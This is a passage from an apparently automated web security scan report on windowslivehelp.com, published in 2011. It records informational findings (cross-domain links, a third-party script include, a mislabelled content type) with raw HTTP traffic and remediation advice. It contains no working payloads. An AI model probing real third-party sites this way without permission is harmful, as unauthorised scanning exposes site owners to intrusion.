<html id="ctl00_htmlID" xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> Account Compromise - Unauthorized Account Access </title><meta http-equiv="content-type" content="text/ ...[SNIP]... <span id="ctl00_lblSignIn"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1319653270&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwindowslivehelp.com%2Fsolution.aspx%3Fsolutionid%3D6ea0c7b3-1473-4176-b03f-145b951dcb41&lc=1033&id=259655">Sign in</a> ...[SNIP]... <li>Can you still <a href="http://account.live.com" target="_blank">sign in </a> ...[SNIP]... <li>If you can't sign in, try <a href="https://account.live.com/resetpassword.aspx" target="_blank">resetting your password</a> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkID=223852&clcid=0x409"><span id="ctl00_LocResource11_lblResource"> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkId=74170"><span id="ctl00_LocResource10_lblResource"> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/?linkid=4412893"><span id="ctl00_LocResource9_lblResource"> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkID=223851&clcid=0x409"><span id="ctl00_LocResource8_lblResource"> ...[SNIP]... <noscript> <img alt="" border="0" ID="DCSIMG" width="1" height="1" src="http://m.webtrends.com/dcsysz48l000004fm6ldsk8rj_6j9y/njs.gif?dcsuri=/nojavascript&WT.js=No"/> </noscript> ...[SNIP]... </script><script type="text/javascript" src="http://support.microsoft.com/common/script/fx/PluginTriggerStrapper.js"></script> ...[SNIP]...
|
2.16. http://windowslivehelp.com/solution.aspx
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://windowslivehelp.com |
Path: |
/solution.aspx |
Issue detail
The page was loaded from a URL containing a query string:- http://windowslivehelp.com/solution.aspx?solutionid=293962dd-b4a0-4ee7-a661-8254ae9c8d78
The response contains the following links to other domains:- http://account.live.com/
- http://go.microsoft.com/?linkid=4412893
- http://go.microsoft.com/fwlink/?LinkID=223851&clcid=0x409
- http://go.microsoft.com/fwlink/?LinkID=223852&clcid=0x409
- http://go.microsoft.com/fwlink/?LinkId=74170
- http://m.webtrends.com/dcsysz48l000004fm6ldsk8rj_6j9y/njs.gif?dcsuri=/nojavascript&WT.js=No
- http://mail.live.com/
- http://my.msn.com/
- http://skydrive.live.com/
- http://support.microsoft.com/common/script/fx/PluginTriggerStrapper.js
- http://www.msn.com/
- https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1319833883&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwindowslivehelp.com%2Fsolution.aspx%3Fsolutionid%3D293962dd-b4a0-4ee7-a661-8254ae9c8d78&lc=1033&id=259655
Request
GET /solution.aspx?solutionid=293962dd-b4a0-4ee7-a661-8254ae9c8d78 HTTP/1.1 Host: windowslivehelp.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://windowslivehelp.com/searchresults.aspx?query=cross%20site%20scripting Cookie: WT_FPC=id=50.23.123.106-2935047696.30165099:lv=1319822893422:ss=1319822726575; WT_NVR=0=/; HVViewedTimes=9; ViewedTimes=9; fmshb=0,1319833876776; UTCOffset=-300; ASP.NET_SessionId=3ubvi4b5mel3hcoagylkadqa
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 4.0.30319 Set-Cookie: HVViewedTimes=11; path=/ Set-Cookie: ViewedTimes=11; path=/ X-Powered-By: ASP.NET Date: Fri, 28 Oct 2011 20:31:23 GMT Content-Length: 36070
<html id="ctl00_htmlID" xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> Troubleshooting Live Services Sign In Failure </title><meta http-equiv="content-type" content="text/htm ...[SNIP]... <span id="ctl00_lblSignIn"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1319833883&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwindowslivehelp.com%2Fsolution.aspx%3Fsolutionid%3D293962dd-b4a0-4ee7-a661-8254ae9c8d78&lc=1033&id=259655">Sign in</a> ...[SNIP]... <li>Try to access your Windows Live <a href="http://account.live.com" target="_blank">account</a> ...[SNIP]... <li><a href="http://mail.live.com/" target="_blank">Windows Live Hotmail</a> ...[SNIP]... <li><a href="http://skydrive.live.com/" target="_blank">Windows Live SkyDrive</a> ...[SNIP]... <li><a href="http://www.msn.com/" target="_blank">MSN</a> ...[SNIP]... <li><a href="http://my.msn.com/" target="_blank">My MSN</a> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkID=223852&clcid=0x409"><span id="ctl00_LocResource11_lblResource"> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkId=74170"><span id="ctl00_LocResource10_lblResource"> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/?linkid=4412893"><span id="ctl00_LocResource9_lblResource"> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkID=223851&clcid=0x409"><span id="ctl00_LocResource8_lblResource"> ...[SNIP]... <noscript> <img alt="" border="0" ID="DCSIMG" width="1" height="1" src="http://m.webtrends.com/dcsysz48l000004fm6ldsk8rj_6j9y/njs.gif?dcsuri=/nojavascript&WT.js=No"/> </noscript> ...[SNIP]... </script><script type="text/javascript" src="http://support.microsoft.com/common/script/fx/PluginTriggerStrapper.js"></script> ...[SNIP]...
|
2.17. http://windowslivehelp.com/solutions.aspx
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://windowslivehelp.com |
Path: |
/solutions.aspx |
Issue detail
The page was loaded from a URL containing a query string:- http://windowslivehelp.com/solutions.aspx?categoryid=ed8796bd-2bab-4833-bedf-29952c2f05f0
The response contains the following links to other domains:- http://go.microsoft.com/?linkid=4412893
- http://go.microsoft.com/fwlink/?LinkID=223851&clcid=0x409
- http://go.microsoft.com/fwlink/?LinkID=223852&clcid=0x409
- http://go.microsoft.com/fwlink/?LinkId=74170
- http://m.webtrends.com/dcsysz48l000004fm6ldsk8rj_6j9y/njs.gif?dcsuri=/nojavascript&WT.js=No
- http://support.microsoft.com/common/script/fx/PluginTriggerStrapper.js
- https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1319653279&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwindowslivehelp.com%2Fsolutions.aspx%3Fcategoryid%3Ded8796bd-2bab-4833-bedf-29952c2f05f0&lc=1033&id=259655
Request
GET /solutions.aspx?categoryid=ed8796bd-2bab-4833-bedf-29952c2f05f0 HTTP/1.1 Host: windowslivehelp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 4.0.30319 Set-Cookie: HVViewedTimes=7; path=/ Set-Cookie: LastProductId=13; path=/ Set-Cookie: ViewedTimes=7; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Oct 2011 18:21:19 GMT Connection: close Content-Length: 37252
<html id="ctl00_htmlID" xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> Contacts </title><meta http-equiv="content-type" content="text/html; charset=UTF-8" /><link rel="styles ...[SNIP]... <span id="ctl00_lblSignIn"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1319653279&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwindowslivehelp.com%2Fsolutions.aspx%3Fcategoryid%3Ded8796bd-2bab-4833-bedf-29952c2f05f0&lc=1033&id=259655">Sign in</a> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkID=223852&clcid=0x409"><span id="ctl00_LocResource11_lblResource"> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkId=74170"><span id="ctl00_LocResource10_lblResource"> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/?linkid=4412893"><span id="ctl00_LocResource9_lblResource"> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkID=223851&clcid=0x409"><span id="ctl00_LocResource8_lblResource"> ...[SNIP]... <noscript> <img alt="" border="0" ID="DCSIMG" width="1" height="1" src="http://m.webtrends.com/dcsysz48l000004fm6ldsk8rj_6j9y/njs.gif?dcsuri=/nojavascript&WT.js=No"/> </noscript> ...[SNIP]... </script><script type="text/javascript" src="http://support.microsoft.com/common/script/fx/PluginTriggerStrapper.js"></script> ...[SNIP]...
|
2.18. http://windowslivehelp.com/solutions.aspx
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://windowslivehelp.com |
Path: |
/solutions.aspx |
Issue detail
The page was loaded from a URL containing a query string:- http://windowslivehelp.com/solutions.aspx?productid=13
The response contains the following links to other domains:- http://go.microsoft.com/?linkid=4412893
- http://go.microsoft.com/fwlink/?LinkID=223851&clcid=0x409
- http://go.microsoft.com/fwlink/?LinkID=223852&clcid=0x409
- http://go.microsoft.com/fwlink/?LinkId=74170
- http://m.webtrends.com/dcsysz48l000004fm6ldsk8rj_6j9y/njs.gif?dcsuri=/nojavascript&WT.js=No
- http://support.microsoft.com/common/script/fx/PluginTriggerStrapper.js
- https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1319653280&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwindowslivehelp.com%2Fsolutions.aspx%3Fproductid%3D13&lc=1033&id=259655
Request
GET /solutions.aspx?productid=13 HTTP/1.1 Host: windowslivehelp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 4.0.30319 Set-Cookie: HVViewedTimes=7; path=/ Set-Cookie: LastProductId=13; path=/ Set-Cookie: ViewedTimes=7; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Oct 2011 18:21:19 GMT Connection: close Content-Length: 37679
<html id="ctl00_htmlID" xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> Profile Solutions </title><meta http-equiv="content-type" content="text/html; charset=UTF-8" /><link re ...[SNIP]... <span id="ctl00_lblSignIn"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1319653280&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwindowslivehelp.com%2Fsolutions.aspx%3Fproductid%3D13&lc=1033&id=259655">Sign in</a> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkID=223852&clcid=0x409"><span id="ctl00_LocResource11_lblResource"> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkId=74170"><span id="ctl00_LocResource10_lblResource"> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/?linkid=4412893"><span id="ctl00_LocResource9_lblResource"> ...[SNIP]... <li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkID=223851&clcid=0x409"><span id="ctl00_LocResource8_lblResource"> ...[SNIP]... <noscript> <img alt="" border="0" ID="DCSIMG" width="1" height="1" src="http://m.webtrends.com/dcsysz48l000004fm6ldsk8rj_6j9y/njs.gif?dcsuri=/nojavascript&WT.js=No"/> </noscript> ...[SNIP]... </script><script type="text/javascript" src="http://support.microsoft.com/common/script/fx/PluginTriggerStrapper.js"></script> ...[SNIP]...
|
3. Cross-domain script include
previous
next
There are 8 instances of this issue:
Issue background
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
3.1. http://windowslivehelp.com/
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://windowslivehelp.com |
Path: |
/ |
Issue detail
The response dynamically includes the following script from another domain:- http://support.microsoft.com/common/script/fx/PluginTriggerStrapper.js
Request
GET / HTTP/1.1 Host: windowslivehelp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 4.0.30319 Set-Cookie: HVViewedTimes=7; path=/ Set-Cookie: ViewedTimes=7; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Oct 2011 18:21:19 GMT Connection: close Content-Length: 34589
<html id="ctl00_htmlID" xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> Windows Live Solution Center </title><meta http-equiv="content-type" content="text/html; charset=UTF-8" ...[SNIP]... </script><script type="text/javascript" src="http://support.microsoft.com/common/script/fx/PluginTriggerStrapper.js"></script> ...[SNIP]...
|
3.2. http://windowslivehelp.com/ack.aspx
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://windowslivehelp.com |
Path: |
/ack.aspx |
Issue detail
The response dynamically includes the following script from another domain:- http://support.microsoft.com/common/script/fx/PluginTriggerStrapper.js
Request
GET /ack.aspx HTTP/1.1 Host: windowslivehelp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 4.0.30319 Set-Cookie: HVViewedTimes=7; path=/ Set-Cookie: ViewedTimes=7; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Oct 2011 18:21:20 GMT Connection: close Content-Length: 32302
<html id="ctl00_htmlID" xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> Acknowledgements </title><meta http-equiv="content-type" content="text/html; charset=UTF-8" /><link rel ...[SNIP]... </script><script type="text/javascript" src="http://support.microsoft.com/common/script/fx/PluginTriggerStrapper.js"></script> ...[SNIP]...
|
3.3. http://windowslivehelp.com/forums.aspx
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://windowslivehelp.com |
Path: |
/forums.aspx |
Issue detail
The response dynamically includes the following script from another domain:- http://support.microsoft.com/common/script/fx/PluginTriggerStrapper.js
Request
GET /forums.aspx HTTP/1.1 Host: windowslivehelp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 4.0.30319 Set-Cookie: HVViewedTimes=7; path=/ Set-Cookie: ViewedTimes=7; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Oct 2011 18:21:19 GMT Connection: close Content-Length: 52454
<html id="ctl00_htmlID" xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> Threads </title><meta http-equiv="content-type" content="text/html; charset=UTF-8" /><link rel="styles ...[SNIP]... </script><script type="text/javascript" src="http://support.microsoft.com/common/script/fx/PluginTriggerStrapper.js"></script> ...[SNIP]...
|
3.4. http://windowslivehelp.com/product.aspx
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://windowslivehelp.com |
Path: |
/product.aspx |
Issue detail
The response dynamically includes the following script from another domain:- http://support.microsoft.com/common/script/fx/PluginTriggerStrapper.js
Request
GET /product.aspx?productid=13 HTTP/1.1 Host: windowslivehelp.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: WT_NVR=0=/; WT_FPC=id=50.23.123.106-382843424.30173056:lv=1317651416674:ss=1317650370882
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 4.0.30319 Set-Cookie: HVViewedTimes=7; path=/ Set-Cookie: LastProductId=13; path=/ Set-Cookie: ViewedTimes=7; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Oct 2011 18:00:53 GMT Content-Length: 37711
<html id="ctl00_htmlID" xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> Profile Portal </title><meta http-equiv="content-type" content="text/html; charset=UTF-8" /><link rel=" ...[SNIP]... </script><script type="text/javascript" src="http://support.microsoft.com/common/script/fx/PluginTriggerStrapper.js"></script> ...[SNIP]...
|
3.5. http://windowslivehelp.com/searchresults.aspx
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://windowslivehelp.com |
Path: |
/searchresults.aspx |
Issue detail
The response dynamically includes the following script from another domain:- http://support.microsoft.com/common/script/fx/PluginTriggerStrapper.js
Request
GET /searchresults.aspx HTTP/1.1 Host: windowslivehelp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 4.0.30319 Set-Cookie: HVViewedTimes=7; path=/ Set-Cookie: ViewedTimes=7; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Oct 2011 18:21:20 GMT Connection: close Content-Length: 32989
<html id="ctl00_htmlID" xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> Search Results </title><meta http-equiv="content-type" content="text/html; charset=UTF-8" /><link rel=" ...[SNIP]... </script><script type="text/javascript" src="http://support.microsoft.com/common/script/fx/PluginTriggerStrapper.js"></script> ...[SNIP]...
|
3.6. http://windowslivehelp.com/solution.aspx
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://windowslivehelp.com |
Path: |
/solution.aspx |
Issue detail
The response dynamically includes the following script from another domain:- http://support.microsoft.com/common/script/fx/PluginTriggerStrapper.js
Request
GET /solution.aspx?solutionid=848f023d-1637-4b6f-a7d4-ebb58ffdd9dc HTTP/1.1 Host: windowslivehelp.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://windowslivehelp.com/product.aspx?productid=13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: WT_NVR=0=/; ASP.NET_SessionId=jxu3f1gj4rgf2h4hxyqjy3k5; UTCOffset=-300; HVViewedTimes=4; LastProductId=13; ViewedTimes=4; WT_FPC=id=50.23.123.106-382843424.30173056:lv=1319640950866:ss=1319640947467; fmshb=0,1319651751873
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 4.0.30319 Set-Cookie: HVViewedTimes=7; path=/ Set-Cookie: LastProductId=13; path=/ Set-Cookie: ViewedTimes=7; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Oct 2011 18:01:27 GMT Content-Length: 49540
<html id="ctl00_htmlID" xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> Windows Live Messenger 2009: How do I block or unblock contacts </title><meta http-equiv="content-type ...[SNIP]... </script><script type="text/javascript" src="http://support.microsoft.com/common/script/fx/PluginTriggerStrapper.js"></script> ...[SNIP]...
|
3.7. http://windowslivehelp.com/solutions.aspx
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://windowslivehelp.com |
Path: |
/solutions.aspx |
Issue detail
The response dynamically includes the following script from another domain:- http://support.microsoft.com/common/script/fx/PluginTriggerStrapper.js
Request
GET /solutions.aspx?categoryid=ed8796bd-2bab-4833-bedf-29952c2f05f0 HTTP/1.1 Host: windowslivehelp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 4.0.30319 Set-Cookie: HVViewedTimes=7; path=/ Set-Cookie: LastProductId=13; path=/ Set-Cookie: ViewedTimes=7; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Oct 2011 18:21:19 GMT Connection: close Content-Length: 37252
<html id="ctl00_htmlID" xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> Contacts </title><meta http-equiv="content-type" content="text/html; charset=UTF-8" /><link rel="styles ...[SNIP]... </script><script type="text/javascript" src="http://support.microsoft.com/common/script/fx/PluginTriggerStrapper.js"></script> ...[SNIP]...
|
3.8. http://windowslivehelp.com/tou.aspx
previous
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://windowslivehelp.com |
Path: |
/tou.aspx |
Issue detail
The response dynamically includes the following script from another domain:- http://support.microsoft.com/common/script/fx/PluginTriggerStrapper.js
Request
GET /tou.aspx HTTP/1.1 Host: windowslivehelp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 4.0.30319 Set-Cookie: HVViewedTimes=7; path=/ Set-Cookie: ViewedTimes=7; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Oct 2011 18:21:19 GMT Connection: close Content-Length: 39624
<html id="ctl00_htmlID" xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> Terms Of Use </title><meta http-equiv="content-type" content="text/html; charset=UTF-8" /><link rel="st ...[SNIP]... </script><script type="text/javascript" src="http://support.microsoft.com/common/script/fx/PluginTriggerStrapper.js"></script> ...[SNIP]...
|
4. Content type incorrectly stated
previous
Summary
Severity: |
Information |
Confidence: |
Firm |
Host: |
http://windowslivehelp.com |
Path: |
/solution.aspx |
Issue detail
The response contains the following Content-type statement:- Content-Type: text/html; charset=utf-8
The response states that it contains HTML. However, it actually appears to contain plain text.
Issue background
If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.
In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.
Request
POST /solution.aspx?solutionid=848f023d-1637-4b6f-a7d4-ebb58ffdd9dc HTTP/1.1 Host: windowslivehelp.com Proxy-Connection: keep-alive Content-Length: 928 Origin: http://windowslivehelp.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept: */* Referer: http://windowslivehelp.com/solution.aspx?solutionid=848f023d-1637-4b6f-a7d4-ebb58ffdd9dc Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: WT_NVR=0=/; ASP.NET_SessionId=jxu3f1gj4rgf2h4hxyqjy3k5; UTCOffset=-300; LastProductId=13; HVViewedTimes=8; ViewedTimes=8; WT_FPC=id=50.23.123.106-382843424.30173056:lv=1319642543020:ss=1319640947467; fmshb=0,1319654387699; vvv=848f023d-1637-4b6f-a7d4-ebb58ffdd9dc
ctl00_RadScriptManager1_TSM=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTE2Njc3NjU1ODFkGAMFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYDBRZjdGwwMCRzZWxTZWFyY2hQcm9kdWN0BShjdGwwMCRzaW5nbGVDb ...[SNIP]...
|
Response
HTTP/1.1 200 OK Cache-Control: private, no-store Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 4.0.30319 Set-Cookie: HVViewedTimes=10; path=/ Set-Cookie: LastProductId=13; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Oct 2011 18:39:52 GMT Content-Length: 110
48|/wEWAgLW/pS7DALE5ML0AgJeObbD3gb7gxqlhz5nPFWthK8S <div id="ctl00_rightColumn4_divTest"></div> |
Report generated by XSS.CX at Sat Oct 29 09:18:02 CDT 2011.